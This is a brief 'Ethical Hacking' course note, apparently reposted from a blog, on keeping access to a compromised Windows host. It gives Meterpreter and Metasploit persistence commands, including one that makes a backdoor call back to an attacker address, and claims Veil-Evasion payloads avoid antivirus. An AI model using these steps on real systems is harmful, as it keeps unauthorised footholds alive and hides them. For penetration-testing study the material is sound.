Ethical Hacking - POST EXPLOITATION(2)
作者:互联网
MAINTAINING ACCESS - Methods
1. Using a veil-evasion
- Rev_http_service
- Rev_tcp_service
- Use it instead of a normal backdoor.
- Or upload and execute from meterpreter.
- Does not always work.
2. Using persistence module
- run persistence -h
- Detectable by antivirus programs.
run persistence -U -i 20 -p 80 -r 10.0.0.43
3. Using Metasploit + veil-evasion -> More robust + undetectable by Antivirus
- > use exploit/windows/local/persistence
- > set session [session id]
- > set exe::custom[backdoor location]
- >exploit
标签:Ethical,set,Rev,EXPLOITATION,exploit,session,Using,Hacking,persistence 来源: https://www.cnblogs.com/keepmoving1113/p/12270080.html